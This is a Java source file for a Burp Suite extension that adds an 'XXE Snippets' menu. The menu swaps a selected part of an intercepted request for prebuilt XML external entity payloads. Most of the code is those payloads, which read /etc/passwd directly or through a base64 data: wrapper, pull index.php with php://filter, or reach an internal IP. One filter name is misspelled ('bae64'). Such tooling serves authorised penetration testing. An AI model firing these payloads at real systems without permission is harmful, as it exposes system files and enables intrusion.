package burp;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import javax.swing.JMenu;
/**
*
* @author errorfiathck
*/
public class XXE_Menu extends JMenu {
public BurpExtender myburp;
public String[] XXE_MenuItems = {"Basic Test","XXE 1", "XXE 2", "XXE 3", "Php wrapper in XXE", "Php wrapper in XXE 2"};
XXE_Menu(BurpExtender burp){
this.setText("XXE Snippets");
this.myburp = burp;
Methods.add_MenuItem_and_listener(this, XXE_MenuItems, new XXEItemListener(myburp));
}
}
class XXEItemListener implements ActionListener {
BurpExtender myburp;
XXEItemListener(BurpExtender burp) {
myburp = burp;
}
@Override
public void actionPerformed(ActionEvent e) {
int[] selectedIndex = myburp.context.getSelectionBounds();
IHttpRequestResponse req = myburp.context.getSelectedMessages()[0];
byte[] request = req.getRequest();
byte[] param = new byte[selectedIndex[1]-selectedIndex[0]];
System.arraycopy(request, selectedIndex[0], param, 0, selectedIndex[1]-selectedIndex[0]);
String selectString = new String(param);
String action = e.getActionCommand();
byte[] newRequest = do_XXE(request, selectString, action, selectedIndex);
req.setRequest(newRequest);
}
public byte[] do_XXE(byte[] request, String selectedString, String action, int[] selectedIndex){
switch(action){
case "Basic Test":
selectedString = "<!--?xml version=\"1.0\" ?-->\n" +
"<!DOCTYPE replace [<!ENTITY example \"Doe\"> ]>\n" +
" <userInfo>\n" +
" <firstName>John</firstName>\n" +
" <lastName>&example;</lastName>\n" +
" </userInfo>";
break;
case "XXE 1":
selectedString = "<?xml version=\"1.0\"?>\n" +
"<!DOCTYPE data [\n" +
"<!ELEMENT data (#ANY)>\n" +
"<!ENTITY file SYSTEM \"file:///etc/passwd\">\n" +
"]>\n";
break;
case "XXE 2":
selectedString = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n" +
" <!DOCTYPE foo [ \n" +
" <!ELEMENT foo ANY >\n" +
" <!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]>";
break;
case "XXE 3":
selectedString = "<!DOCTYPE test [ <!ENTITY % init SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"> %init; ]><foo/>";
break;
case "Php wrapper in XXE":
selectedString = "<!DOCTYPE replace [<!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=index.php\"> ]>";
break;
case "Php wrapper in XXE 2":
selectedString = "<!DOCTYPE foo [\n" +
"<!ELEMENT foo ANY >\n" +
"<!ENTITY % xxe SYSTEM \"php://filter/convert.bae64-encode/resource=http://10.0.0.3\" >\n" +
"]>";
break;
default:
break;
}
return Methods.do_modify_request(request, selectedIndex, selectedString);
}
}